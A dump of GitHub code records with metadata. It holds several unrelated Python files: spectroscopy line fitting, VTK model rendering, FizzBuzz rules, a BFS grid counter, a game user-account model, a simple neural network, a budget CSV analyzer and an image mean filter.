self).__init__(calc_harmonic_transition, **kwargs)\n\n\nclass PairGaussianModel(PySpecModel):\n def __init__(self, **kwargs):\n super(PairGaussianModel, self).__init__(\n lineshapes.pair_gaussian, independent_vars=[\"x\"], **kwargs\n )\n\n def fit_pair(self, x, y, verbose=False):\n # Automatically find where the Doppler splitting is\n indexes = peakutils.indexes(y, thres=0.4, min_dist=10)\n best_two = np.argsort(y[indexes])\n guess_center = np.average(x[best_two])\n guess_sep = np.std(x[best_two])\n # This calculates the amplitude of a Gaussian based on\n # the peak height\n prefactor = np.sqrt(2.0 * np.pi) * 0.01\n guess_amp = np.average(y[best_two]) * prefactor\n # Set the parameter guesses\n self.params[\"A1\"].set(guess_amp)\n self.params[\"A2\"].set(guess_amp)\n self.params[\"w\"].set(0.005, min=0.0001, max=0.03)\n if np.isfinite(guess_sep) is True:\n self.params[\"xsep\"].set(guess_sep, min=guess_sep * 0.8, max=guess_sep * 1.2)\n else:\n self.params[\"xsep\"].set(0.05)\n self.params[\"x0\"].set(\n guess_center, min=guess_center - 0.6, max=guess_center + 0.6\n )\n if verbose is True:\n print(\"Peaks found: {}\".format(x[best_two]))\n print(\"Initial parameters:\")\n for key, value in self.params.items():\n print(key, value)\n results = self.fit(data=y, x=x, params=self.params)\n return results\n\n\ndef rotor_energy(J, B, D=0.0):\n \"\"\" Expression for a linear/prolate top with\n centrifugal distortion.\n\n parameters:\n ---------------\n J - integer quantum number\n B - rotational constant in MHz\n D - CD term in MHz\n\n returns:\n --------------\n state energy in MHz\n \"\"\"\n return B * J * (J + 1) - D * J ** 2.0 * (J + 1) ** 2.0\n\n\ndef calc_harmonic_transition(J, B, D=0.0):\n \"\"\"\n Calculate the transition frequency for\n a given upper state J, B, and D.\n\n parameters:\n --------------\n J - quantum number\n B - rotational constant in MHz\n D - centrifugal distortion constant in MHz\n\n returns:\n --------------\n transition frequency in MHz\n \"\"\"\n lower = rotor_energy(J - 1, B, D)\n upper = rotor_energy(J, B, D)\n return upper - lower\n\n\ndef quant_check(value, threshold=0.001):\n \"\"\"\n Function that will check if a value is close\n to an integer to the absolute value of the threshold.\n \n parameters:\n ---------------\n value - float for number to check\n threshold - float determining whether value is\n close enough to being integer\n \n returns:\n ---------------\n True if the value is close enough to being an integer,\n False otherwise.\n \"\"\"\n nearest_half = np.round(value * 2) / 2\n return np.abs(nearest_half - value) <= threshold\n\n\ndef harmonic_fitter(progressions, J_thres=0.01):\n \"\"\"\n Function that will sequentially fit every progression\n with a simple harmonic model defined by B and D. The\n \"B\" value here actually corresponds to B+C for a near-prolate,\n or 2B for a prolate top.\n \n There are a number of filters applied in order to minimize\n calculations that won't be meaningful - these parameters\n may have to be tuned for different test cases.\n \n Because the model is not actually quantized, J is\n represented as a float. To our advantage, this will\n actually separate real (molecular) progressions from\n fake news; at least half of the J values must be\n close to being an integer for us to consider fitting.\n \n parameters:\n ---------------\n progressions - iterable containing arrays of progressions\n J_thres - optional argument corresponding to how close a\n value must be to an integer\n \n returns:\n ---------------\n pandas dataframe containing the fit results; columns\n are B, D, fit RMS, and pairs of columns corresponding\n to the fitted frequency and approximate J value.\n \"\"\"\n BJ_fit_model = lmfit.models.Model(calc_harmonic_transition)\n params = BJ_fit_model.make_params()\n data = list()\n fit_objs = list()\n failed = list()\n for index, progression in tqdm(enumerate(progressions)):\n # Determine the approximate value of B based on\n # the differences between observed transitions\n approx_B = np.average(np.diff(progression))\n # Calculate the values of J that are assigned based on B\n J = (progression / approx_B) / 2.0\n # We want at least half of the lines to be close to being integer\n if len(progression) >= 2:\n if np.sum(quant_check(J, J_thres)) >= len(progression) / 1.5:\n # Let B vary a bit\n params[\"B\"].set(approx_B, min=approx_B * 0.9, max=approx_B * 1.1)\n # Constrain D to be less than 5 MHz\n params[\"D\"].set(0.001, min=0.0, max=1.0)\n fit = BJ_fit_model.fit(\n data=progression, J=J, params=params, fit_kws={\"maxfev\": 100}\n )\n # Only include progressions that can be fit successfully\n if fit.success is True:\n # Calculate fit RMS\n rms = np.sqrt(np.average(np.square(fit.residual)))\n # Only add it to the list of the RMS is\n # sufficiently low\n return_dict = dict()\n return_dict[\"RMS\"] = rms\n return_dict.update(fit.best_values)\n # Make columns for frequency and J\n for i, frequency in enumerate(progression):\n return_dict[i] = frequency\n return_dict[\"J{}\".format(i)] = J[i]\n data.append(return_dict)\n fit_objs.append(fit)\n else:\n failed.append([index, fit.fit_report()])\n else:\n failed.append(index)\n else:\n return_dict = dict()\n return_dict[\"RMS\"] = 0.0\n return_dict[\"B\"] = approx_B\n # reformat the frequencies and approximate J values\n for i, frequency in enumerate(progression):\n return_dict[i] = frequency\n return_dict[\"J{}\".format(i)] = J[i]\n data.append(return_dict)\n full_df = pd.DataFrame(data=data)\n full_df.sort_values([\"RMS\", \"B\", \"D\"], ascending=False, inplace=True)\n return full_df, fit_objs\n\n\ndef baseline_als(y, lam=1e4, p=0.01, niter=10):\n \"\"\"\n Function for performing an iterative baseline\n fitting using the asymmetric least squares algorithm.\n\n This refers to the paper:\n \"Baseline Correction with Asymmetric Least Squares Smoothing\"\n by Eilers and Boelens (2005).\n\n The code is taken from a Stack Overflow question:\n https://stackoverflow.com/a/29185844\n\n According to the paper, the tested values are:\n 0.001 <= p <= 0.1 for positive peaks\n 1e2 <= lam <= 1e9\n\n Parameters:\n --------------\n y : numpy 1D array\n Data used to fit the baseline\n lam : float\n Tuning factor for penalty function that offsets the difference cost function\n p : float\n Weighting factor for the cost function\n\n Returns:\n --------------\n z : numpy 1D array\n Array containing the baseline values\n \"\"\"\n L = len(y)\n D = sparse.diags([1, -2, 1], [0, -1, -2], shape=(L, L - 2))\n # Initialize a set of weights\n w = np.ones(L)\n # Iterate for a set number of times to fit baseline\n for i in range(niter):\n W = sparse.spdiags(w, 0, L, L)\n Z = W + lam * D.dot(D.transpose())\n z = spsolve(Z, w * y)\n w = p * (y > z) + (1 - p) * (y < z)\n return z\n","repo_name":"laserkelvin/PySpecTools","sub_path":"pyspectools/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"31"} +{"seq_id":"34293315030","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport vtk\r\nimport math\r\nimport cv2 as cv\r\nimport numpy as np\r\nfrom vtk.util import numpy_support\r\n\r\nphi = (1+math.sqrt(5))/2\r\nvertices = [\r\n [1, 1, 1],\r\n [1, 1, -1],\r\n [1, -1, 1],\r\n [1, -1, -1],\r\n [-1, 1, 1],\r\n [-1, 1, -1],\r\n [-1, -1, 1],\r\n [-1, -1, -1],\r\n \r\n [0, 1/phi, phi],\r\n [0, 1/phi, -phi],\r\n [0, -1/phi, phi],\r\n [0, -1/phi, -phi],\r\n \r\n [phi, 0, 1/phi],\r\n [phi, 0, -1/phi],\r\n [-phi, 0, 1/phi],\r\n [-phi, 0, -1/phi],\r\n \r\n [1/phi, phi, 0],\r\n [-1/phi, phi, 0],\r\n [1/phi, -phi, 0],\r\n [-1/phi, -phi, 0]\r\n ]\r\n\r\n\r\ndef vtkImgToNumpyArray(vtkImageData):\r\n rows, cols, _ = vtkImageData.GetDimensions()\r\n scalars = vtkImageData.GetPointData().GetScalars()\r\n resultingNumpyArray = numpy_support.vtk_to_numpy(scalars)\r\n resultingNumpyArray = resultingNumpyArray.reshape(cols, rows, -1)\r\n red, green, blue, alpha = np.dsplit(resultingNumpyArray, resultingNumpyArray.shape[-1])\r\n resultingNumpyArray = np.stack([blue, green, red, alpha], 2).squeeze()\r\n resultingNumpyArray = np.flip(resultingNumpyArray, 0)\r\n return resultingNumpyArray\r\n\r\ndef resize_image(img, outputSize, minMargin, maxArea):\r\n nCh = img.shape[2]\r\n max_len = outputSize * (1 - minMargin)\r\n max_area = outputSize * outputSize * maxArea\r\n\r\n img1 = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n ret, mask = cv.threshold(img1, 254, 255, cv.THRESH_BINARY_INV)\r\n\r\n [ys, xs] = np.where(mask > 0)\r\n y_min = min(ys)\r\n y_max = max(ys)\r\n h = y_max - y_min + 1\r\n x_min = min(xs)\r\n x_max = max(xs)\r\n w = x_max - x_min + 1\r\n scale = min(max_len / max(h, w), math.sqrt(max_area / sum(sum(mask))))\r\n ii = img[y_min:(y_max + 1), x_min:(x_max + 1), :]\r\n patch = cv.resize(ii, (0, 0), fx=scale, fy=scale, interpolation=cv.INTER_CUBIC)\r\n h = patch.shape[0]\r\n w = patch.shape[1]\r\n\r\n im = np.ones([outputSize, outputSize, nCh], np.uint8)\r\n im = 255 * im\r\n loc_start1 = math.floor((outputSize - h) / 2.0)\r\n loc_start2 = math.floor((outputSize - w) / 2.0)\r\n xx = np.arange(0, h) + h\r\n yy = np.arange(0, w) + w\r\n im[loc_start1:(loc_start1 + h), loc_start2:(loc_start2 + w), :] = patch\r\n\r\n return im\r\n\r\n\r\ndef objToViews_sync(objFloderName, viewFloderName, imageType, objFileName):\r\n #Obj reader\r\n objReader = vtk.vtkOBJReader()\r\n # objReader = vtk.vtkPLYReader()\r\n flieName = objFloderName + '/' + objFileName\r\n objReader.SetFileName(flieName)\r\n objReader.Update()\r\n\r\n #Polydata normal\r\n polydataNormal = vtk.vtkPolyDataNormals()\r\n polydataNormal.SetInputConnection(objReader.GetOutputPort())\r\n polydataNormal.ConsistencyOff()\r\n polydataNormal.SplittingOff()\r\n polydataNormal.Update()\r\n\r\n #Polydata mapper\r\n mapper = vtk.vtkPolyDataMapper()\r\n mapper.SetInputConnection(polydataNormal.GetOutputPort())\r\n\r\n # Actor\r\n actor = vtk.vtkActor()\r\n actor.SetMapper(mapper)\r\n actor.GetProperty().SetInterpolationToPhong()\r\n actor.GetProperty().SetAmbient(0.3)\r\n actor.GetProperty().SetDiffuse(0.6)\r\n actor.GetProperty().SetSpecular(0.0)\r\n\r\n #需要旋转的话用\r\n # trans = vtk.vtkTransform()\r\n # trans.RotateZ(90)\r\n # trans.RotateX(-90)\r\n # actor.SetUserTransform(trans)\r\n\r\n renderWindow = vtk.vtkRenderWindow()\r\n renderWindow.SetWindowName(\"obj viewer\")\r\n\r\n minMargin = 0.1\r\n maxArea = 0.3\r\n outputSize = 227\r\n for i in range(0,len(vertices)):\r\n renderer = vtk.vtkRenderer()\r\n renderer.AddActor(actor)\r\n renderer.SetBackground(1.0, 1.0, 1.0)\r\n\r\n camera = vtk.vtkCamera()\r\n camera.SetPosition(vertices[i])\r\n camera.SetFocalPoint(0,0,0)\r\n camera.SetViewAngle(60)\r\n # camera.Roll(j*90)\r\n\r\n renderer.SetActiveCamera(camera)\r\n renderer.ResetCameraClippingRange()\r\n\r\n renderWindow.AddRenderer(renderer)\r\n renderWindow.Render()\r\n\r\n # Window to image filter\r\n winToImageFilter = vtk.vtkWindowToImageFilter()\r\n winToImageFilter.SetInput(renderWindow)\r\n winToImageFilter.SetScale(2)\r\n winToImageFilter.SetInputBufferTypeToRGBA()\r\n winToImageFilter.Update()\r\n\r\n img_vtk = winToImageFilter.GetOutput()\r\n img_np = vtkImgToNumpyArray(img_vtk)\r\n\r\n img_result = resize_image(img_np, outputSize, minMargin, maxArea)\r\n # viewNum = \"%03d\"%(i*4+j)\r\n viewNum = \"%03d\"%(i)\r\n filename = viewFloderName + '/' + objFileName[0:len(objFileName)-4] + '_' + viewNum + imageType\r\n cv.imwrite(filename,img_result)\r\n \r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n objToViews('E:/vtkTest','0_f.obj','E:/vtkTest', '.bmp')","repo_name":"alittleTom/OVFF","sub_path":"Others/objViews_sync.py","file_name":"objViews_sync.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"39383462150","text":"from typing import Callable, Tuple\nfrom math import sqrt\n\n\ndef index_replacer(n:int, test:Callable[[int],bool], value: str) -> str:\n return value if test(n) else ''\n\ndef rule_manager(n:int, rules:list[Tuple[Callable[[int],bool], str]]):\n ret = ''\n for test, val in rules:\n ret += index_replacer(n, test, val)\n return ret or n\n\n\nFIZZ_BUZZ_RULES = [\n (lambda n: n % 3 == 0, \"Fizz\" ),\n (lambda n: n % 5 == 0, \"Buzz\" )\n]\n\nJEDI_RULES = [\n *FIZZ_BUZZ_RULES,\n (lambda n: sqrt(n) % 2 == 0, \"Meh\" ),\n\n]\n\nif __name__ == \"__main__\":\n print([rule_manager(n, FIZZ_BUZZ_RULES) for n in range(1,51)])\n print(\"===============\")\n print([rule_manager(n, JEDI_RULES) for n in range(1,51)])","repo_name":"Luviz/CodeResume","sub_path":"Python/fizzBuzz/enterpriceEdtion.py","file_name":"enterpriceEdtion.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"43252975956","text":"from collections import deque\r\ndef bfs(pictures, x, y):\r\n queue = deque()\r\n dx = [1, -1, 0, 0]\r\n dy = [0, 0, 1, -1]\r\n cnt = 1\r\n\r\n queue.append((x, y))\r\n while queue:\r\n x, y= queue.popleft()\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n if nx<=-1 or ny<= -1 or nx>=n or ny>=m:\r\n continue\r\n if pictures[nx][ny] == 0:\r\n continue\r\n if pictures[nx][ny]==1:\r\n pictures[nx][ny] = 0\r\n cnt += 1\r\n queue.append((nx, ny))\r\n return cnt\r\n\r\nn, m = map(int, input().split())\r\npictures = []\r\nfor i in range(n):\r\n a = list(map(int, input().split()))\r\n pictures.append(a)\r\nli = []\r\nfor i in range(n):\r\n for j in range(m):\r\n if pictures[i][j] == 1:\r\n pictures[i][j] = 0\r\n li.append(bfs(pictures, i, j))\r\nif li == []:\r\n print(0)\r\n print(0)\r\nelse:\r\n print(len(li))\r\n print(max(li))\r\n\r\n","repo_name":"hyuns22/coding_test_practice","sub_path":"백준/Silver/1926. 그림/그림.py","file_name":"그림.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34947660139","text":"#-*- coding: utf-8 -*-\r\nimport time\r\nimport datetime\r\n\r\nfrom apps.common import utils\r\nfrom apps.oclib.model import UserModel\r\n\r\nfrom apps.models.user_name import UserName\r\nfrom apps.models.account_mapping import AccountMapping\r\nfrom apps.models.user_compete import UserCompete\r\n\r\nclass UserBase(UserModel):\r\n #\"\"\"用户基本信息\r\n #\"\"\"\r\n pk = 'uid'\r\n fields = ['uid','baseinfo']\r\n def __init__(self):\r\n #\"\"\"初始化用户基本信息\r\n #\"\"\"\r\n self.uid = None\r\n self.baseinfo = {}\r\n \r\n @classmethod\r\n def get(cls,uid):\r\n obj = super(UserBase,cls).get(uid)\r\n return obj\r\n \r\n @classmethod\r\n def get_uid(cls,pid,subarea):\r\n \"\"\"获取uid\r\n \"\"\"\r\n oc_uid = AccountMapping.get_user_id(pid, subarea)\r\n return oc_uid\r\n \r\n @classmethod\r\n def _install(cls,pid,platform,subarea):\r\n #\"\"\"检测安装用户 \r\n #\"\"\"\r\n uid = cls.get_uid(pid,subarea)\r\n oc_user = cls.get(uid)\r\n if oc_user is None: \r\n oc_user = cls._install_new_user(uid,pid,platform,subarea)\r\n return oc_user\r\n \r\n @classmethod\r\n def _install_new_user(cls,uid,pid,platform,subarea):\r\n #\"\"\"安装新用户,初始化用户及游戏数据\r\n #\"\"\"\r\n now = int(time.time())\r\n oc_user = cls.create(uid)\r\n oc_user.baseinfo[\"pid\"] = pid\r\n oc_user.baseinfo[\"username\"] = ''\r\n oc_user.baseinfo[\"platform\"] = platform\r\n oc_user.baseinfo[\"subarea\"] = subarea\r\n oc_user.baseinfo[\"add_time\"] = now\r\n oc_user.baseinfo['bind_time'] = now\r\n oc_user.put() \r\n \r\n from apps.models.user_property import UserProperty\r\n from apps.models.user_cards import UserCards \r\n UserProperty._install(uid)\r\n UserCards._install(uid) \r\n return oc_user\r\n \r\n @classmethod\r\n def create(cls,uid):\r\n obj = cls()\r\n obj.uid = uid\r\n obj.baseinfo = {\r\n 'pid':'',#内部32位的唯一id\r\n 'username':'',# 用户姓名\r\n 'add_time':int(time.time()),# 安装时间\r\n 'frozen':False,\r\n 'frozen_count':0,#已冻结次数\r\n 'unfroze_time':None,#解冻时间\r\n 'openid':'',#开放平台有openid\r\n 'platform':'oc',#开放平台\r\n 'subarea': '1', # 分区号\r\n 'sign':'',#签名\r\n 'username_cold_time':'',#修改日期冷却时间 \r\n }\r\n return obj \r\n \r\n @property\r\n def subarea(self):\r\n #\"\"\"分区号\r\n #\"\"\"\r\n return str(self.baseinfo.get('subarea', '1'))\r\n \r\n @property\r\n def username(self):\r\n return self.baseinfo['username']\r\n \r\n @property\r\n def platform(self):\r\n return self.baseinfo.get('platform','oc')\r\n \r\n @property\r\n def pid(self):\r\n return self.baseinfo['pid']\r\n \r\n @property\r\n def add_time(self):\r\n return self.baseinfo['add_time']\r\n \r\n @property\r\n def frozen(self):\r\n return self.baseinfo['frozen']\r\n \r\n @property\r\n def in_frozen(self):\r\n #\"\"\"是否处于冻结期\r\n #\"\"\"\r\n if self.frozen:\r\n return True\r\n now = int(time.time())\r\n if self.baseinfo.get('unfroze_time') and self.baseinfo.get('unfroze_time') > now:\r\n return True\r\n return False\r\n\r\n @property\r\n def sign(self):\r\n if 'sign' not in self.baseinfo:\r\n self.baseinfo['sign'] = ''\r\n return self.baseinfo['sign']\r\n \r\n @property \r\n def account(self):\r\n #\"\"\"用户账户信息\r\n #\"\"\"\r\n if not hasattr(self, '_account'):\r\n self._account = AccountMapping.get(self.pid)\r\n return self._account\r\n \r\n @property\r\n def username_cold_time(self):\r\n \"\"\"修改日期冷却时间\r\n \"\"\"\r\n if 'username_cold_time' not in self.baseinfo:\r\n self.baseinfo['username_cold_time'] = ''\r\n return self.baseinfo['username_cold_time'] \r\n \r\n def froze(self):\r\n #\"\"\"冻结账户,前两次按时间,累计三次之后永久\r\n #\"\"\"\r\n msg = ''\r\n if self.in_frozen:\r\n return ''\r\n frozen_count = self.baseinfo.get('frozen_count',0)\r\n if frozen_count:\r\n self.baseinfo['frozen_count'] += 1\r\n else:\r\n self.baseinfo['frozen_count'] = 1\r\n #首次冻结2天,再次7天,3次永久\r\n now = datetime.datetime.now()\r\n if self.baseinfo['frozen_count'] == 1:\r\n frozen_days = 2\r\n self.baseinfo['unfroze_time'] = utils.datetime_toTimestamp(now + datetime.timedelta(days=frozen_days))\r\n msg = utils.get_msg('login','frozen_time', self)\r\n msg = msg % (frozen_days,utils.timestamp_toString(self.baseinfo['unfroze_time'],'%m.%d %H:%M'),self.uid)\r\n elif self.baseinfo['frozen_count'] == 2:\r\n frozen_days = 7\r\n self.baseinfo['unfroze_time'] = utils.datetime_toTimestamp(now + datetime.timedelta(days=frozen_days))\r\n msg = utils.get_msg('login','frozen_time', self)\r\n msg = msg % (frozen_days,utils.timestamp_toString(self.baseinfo['unfroze_time'],'%m.%d %H:%M'),self.uid)\r\n else:\r\n self.baseinfo['frozen'] = True\r\n self.baseinfo['username'] = u'(已冻结)' + self.baseinfo['username']\r\n msg = utils.get_msg('login','frozen', self) % self.uid\r\n self.put()\r\n return msg\r\n\r\n def unfroze(self):\r\n #\"\"\"解冻\r\n #\"\"\"\r\n if self.in_frozen:\r\n if self.frozen:\r\n self.baseinfo['frozen'] = False\r\n if u'(已冻结)' in self.username:\r\n self.baseinfo['username'] = self.username[5:]\r\n else:\r\n self.baseinfo['unfroze_time'] = None\r\n self.put()\r\n return\r\n \r\n @property \r\n def property_info(self):\r\n \"\"\"用户游戏属性\r\n \"\"\"\r\n if not hasattr(self, '_property_info'):\r\n from apps.models.user_property import UserProperty\r\n self._property_info = UserProperty.get(self.uid)\r\n return self._property_info\r\n\r\n def wrapper_info(self):\r\n \"\"\"将自己的信息打包成字典\r\n \"\"\"\r\n now = datetime.datetime.now()\r\n from apps.models.user_property import UserProperty\r\n from apps.models.user_dungeon import UserDungeon\r\n user_property_obj = UserProperty.get(self.uid)\r\n data = {\r\n 'uid':self.uid,\r\n 'pid':self.pid,\r\n 'subarea':self.subarea,\r\n 'platform':self.platform,\r\n 'username':self.username,\r\n 'exp':user_property_obj.property_info['exp'], #经验值\r\n 'lv':user_property_obj.property_info['lv'], #等级\r\n 'diamond':user_property_obj.property_info['diamond'],#付费货币\r\n 'coin':user_property_obj.property_info['coin'], #免费货币\r\n #'vip_lv':user_property_obj.property_info['vip_lv'],#vip等级 \r\n 'smelting':user_property_obj.property_info.get('smelting',0),#熔炼值 \r\n 'cp':user_property_obj.property_info.get('cp',0),#荣誉 \r\n 'popularity':user_property_obj.property_info.get('popularity',0),#声望\r\n 'max_card_num':user_property_obj.property_info.get(\"max_card_num\",50),#背包栏个数\r\n 'charge_sum':user_property_obj.charge_sum,\r\n 'first_charge':user_property_obj.first_charge,\r\n }\r\n user_dungeon_obj = UserDungeon.get_instance(self.uid)\r\n data[\"max_floor_id\"] = user_dungeon_obj.dungeon_info[\"max_floor_id\"]\r\n data[\"last_floor_id\"] = user_dungeon_obj.dungeon_info[\"last\"][\"floor_id\"]\r\n #八点发奖励\r\n if now.hour >= 20:\r\n user_compete_obj = UserCompete.get_instance(self.uid)\r\n user_compete_obj.send_rank_reward() \r\n #邮件的个数\r\n data[\"mail_num\"] = self.mail_num()\r\n return data \r\n \r\n def set_name(self,name):\r\n \"\"\"设置初始用户名\r\n \"\"\"\r\n if UserName.get(name):\r\n return False\r\n try:\r\n UserName.set_name(self.uid, name)\r\n except:\r\n return False\r\n self.baseinfo['username'] = name\r\n self.put()\r\n return True\r\n \r\n def mail_num(self):\r\n \"\"\"邮件的个数\r\n \"\"\"\r\n from apps.models.user_mail import UserMail\r\n user_mail_obj = UserMail.hgetall(self.uid) \r\n return len(user_mail_obj)\r\n","repo_name":"leigeng2014/sango2","sub_path":"apps/models/user_base.py","file_name":"user_base.py","file_ext":"py","file_size_in_byte":8843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13432130921","text":"import numpy as np\n\n\nclass NeuralNetwork:\n\n def __init__(self):\n self._layers = []\n\n def add_layer(self, layer):\n self._layers.append(layer)\n\n def get_layer(self, index):\n return self._layers[index]\n\n def feed_forward(self, X):\n\n for layer in self._layers:\n X = layer.activate(X)\n\n return X\n\n def predict(self, X, net_type='regression', n_neurons=3):\n ff = self.feed_forward(X)\n if net_type == 'classification':\n if ff.ndim == 1:\n pred = np.argmax(ff)\n else:\n pred = np.argmax(ff, axis=1)\n if net_type == 'regression':\n pred = ff\n\n return pred\n\n def backpropagation(self, X, y, learning_rate, lmbd, output):\n for i in reversed(range(len(self._layers))):\n layer = self._layers[i]\n if layer == self._layers[-1]:\n layer.error = y - output\n layer.delta = layer.error * layer._activationPrime(output)\n else:\n next_layer = self._layers[i + 1]\n layer.error = np.dot(next_layer.weights, next_layer.delta)\n layer.delta = layer.error * layer._activationPrime(layer.last_activation)\n\n\n for i in range(len(self._layers)):\n layer = self._layers[i]\n input_to_use = np.atleast_2d(X if i == 0 else self._layers[i - 1].last_activation)\n layer.weights = layer.weights + layer.delta * input_to_use.T * learning_rate\n if lmbd > 0:\n layer.weights = layer.weights * (\n 1 - lmbd * learning_rate) + layer.delta * input_to_use.T * learning_rate\n layer.bias = layer.bias + layer.delta * learning_rate\n\n\n def train(self, X, y, learning_rate, nb_epochs = 100, batch_size = 10, lmbd=0, _type = 'regression'):\n iterations = X.shape[0] // batch_size\n mses = []\n for i in range(1, nb_epochs+1):\n np.random.shuffle(X)\n np.random.shuffle(y)\n for k in range(iterations):\n random_index = np.random.randint(iterations)\n Xi = X[random_index * batch_size:(random_index + 1) * batch_size]\n Yi = y[random_index * batch_size:(random_index + 1) * batch_size]\n for j in range(len(Xi)):\n output = self.feed_forward(Xi[j])\n self.backpropagation(Xi[j], Yi[j], learning_rate, lmbd, output)\n\n\n if (_type == 'regression'):\n mse = np.mean(np.square(y - self.predict(X, net_type= _type)))\n mses.append(mse)\n print('Epoch: #%s, MSE: %f' % (i, float(mse)))\n\n return mses\n\n def MSE(self, y_pred, y_true):\n return (1 / len(y_true)) * np.sum((y_pred - y_true) ** 2)\n\n","repo_name":"paulgiraudIMT/Project2","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12521157125","text":"#Import Module\r\nimport os\r\nimport csv\r\n\r\n#Create CSV Pathway\r\nbudgetcsvpath = os.path.join(\".\", \"Resources\", \"budget_data.csv\")\r\n\r\n#Open CSV, Create CSV Reader, Skip Header\r\nwith open(budgetcsvpath, newline='') as budgetcsv:\r\n budgetreader = csv.reader(budgetcsv, delimiter = ',')\r\n budgetheader = next(budgetreader)\r\n \r\n #Define Variables and Lists\r\n totalamount = 0\r\n totalmonths = 0\r\n monthlyamount = []\r\n changeamount = []\r\n months = []\r\n \r\n #Calculate Total Months and Total P&L, Create Separate Lists for Months and Profits/Losses\r\n for row in budgetreader:\r\n amount = int(row[1])\r\n totalmonths = totalmonths + 1\r\n totalamount = totalamount + amount\r\n monthlyamount.append(amount)\r\n months.append(row[0])\r\n \r\n #Calculate Change Between Each Month Into a List\r\n for amountindex in range(len(monthlyamount)):\r\n if amountindex == 0:\r\n current = 0\r\n past = 0\r\n else:\r\n current = int(monthlyamount[amountindex])\r\n past = int(monthlyamount[amountindex - 1])\r\n \r\n changeamount.append(current - past)\r\n \r\n #Calculate the Average Change, Biggest Increase, and Biggest Decrease\r\n avgchange = sum(changeamount)/ (len(changeamount)-1)\r\n incchange = max(changeamount)\r\n decchange = min(changeamount)\r\n \r\n #Capture the List Index for Biggest Increase and Biggest Decrease\r\n for changeindex in range(len(changeamount)):\r\n if changeamount[changeindex] == incchange:\r\n incindex = changeindex\r\n if changeamount[changeindex] == decchange:\r\n decindex = changeindex\r\n \r\n #Find the Months Linked to the Biggest Increase and Biggest Decrease\r\n for monthindex in range(len(months)):\r\n if monthindex == incindex:\r\n incmonth = months[monthindex]\r\n if monthindex == decindex:\r\n decmonth = months[monthindex]\r\n \r\n #Making Financial Analysis String\r\n line1 = f'Financial Analysis'\r\n line2 = f'----------------------------'\r\n line3 = f'Total Months: {totalmonths}'\r\n line4 = f'Total: ${totalamount}'\r\n line5 = f'Average Change: ${avgchange}'\r\n line6 = f'Greatest Increase in Profits: {incmonth} (${incchange})'\r\n line7 = f'Greatest Decrease in Profits: {decmonth} (${decchange})'\r\n\r\n #Printing Financial Analysis in Terminal\r\n print(f'{line1}\\n{line2}\\n{line3}\\n{line4}\\n{line5}\\n{line6}/n{line7}')\r\n \r\n #Determining if Analysis.txt exists in Analysis SubDirectory\r\n filepath = os.path.join(\".\",\"analysis\",\"Analysis.txt\")\r\n isfile = os.path.isfile(filepath)\r\n path = os.path.join(\".\",\"analysis\")\r\n \r\n #If Analysis.txt Does Not Exist, Creates Analysis.txt and Populates\r\n if isfile == False:\r\n with open(os.path.join(path, \"Analysis.txt\"), \"w\") as analysis:\r\n analysis.write(f'{line1}\\n')\r\n analysis.write(f'{line2}\\n')\r\n analysis.write(f'{line3}\\n')\r\n analysis.write(f'{line4}\\n')\r\n analysis.write(f'{line5}\\n')\r\n analysis.write(f'{line6}\\n')\r\n analysis.write(f'{line7}')","repo_name":"yohokr7/python-challenge","sub_path":"PythonChallenge/PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44014824307","text":"from PIL import Image, ImageTk\nimport tkinter\nimport tkinter.messagebox\nfrom tkinter.constants import *\nimport numpy as np\nfrom statistics import median\n\nwindow = None\n\ndef LoadPicture():\n global img, img1, img2, img3, img4, load, load1, load2, load3, load4, pixel, window, render\n load = None\n load1 = None\n load2 = None\n load3 = None\n load4 = None\n pixel = None\n img = tkinter.Label(window)\n img1 = tkinter.Label(window)\n img2 = tkinter.Label(window)\n img3 = tkinter.Label(window)\n img4 = tkinter.Label(window)\n load1 = Image.open(\"BarTest.tif\")\n load2 = Image.open(\"BarTest.tif\")\n load3 = Image.open(\"BarTest.tif\")\n load4 = Image.open(\"BarTest.tif\")\n load = Image.open(\"Bartest.tif\")\n pixel = load.load()\n render = ImageTk.PhotoImage(load)\n img.config(image = render, width = 300, height = 300)\n img.image = render\n img1.config(image = render, width = 300, height = 300)\n img1.image = render\n img2.config(image = render, width = 300, height = 300)\n img2.image = render\n img3.config(image = render, width = 300, height = 300)\n img3.image = render\n img4.config(image = render, width = 300, height = 300)\n img4.image = render\n\ndef MeanFilter7x7():\n global load1,img1\n nparr = []\n dt = np.dtype(np.float64)\n\n for x in range(load1.size[0]):\n arr = []\n for y in range(load1.size[1]):\n arr.append(load1.getpixel((x, y)))\n nparr.append(arr.copy())\n nparr = np.array(nparr, dt)\n\n nparr = np.c_[nparr,np.zeros((load1.size[1],3))]\n nparr = np.c_[np.zeros((load1.size[1],3)),nparr]\n nparr = np.r_[np.zeros((3,load1.size[0]+6)),nparr]\n nparr = np.r_[nparr,np.zeros((3,load1.size[0]+6))]\n\n _nparr = nparr.copy()\n \n for x in range(1,load1.size[0]+1):\n for y in range(1,load1.size[1]+1):\n temp = 0\n for i in (0,1,-1,2,-2,3,-3):\n for j in (0,1,-1,2,-2,3,-3):\n temp += nparr[x+i][y+j]\n _nparr[x][y] = round( temp/49 )\n\n new_img = load1.load()\n\n for x in range(1,load1.size[0]+1):\n for y in range(1,load1.size[1]+1):\n 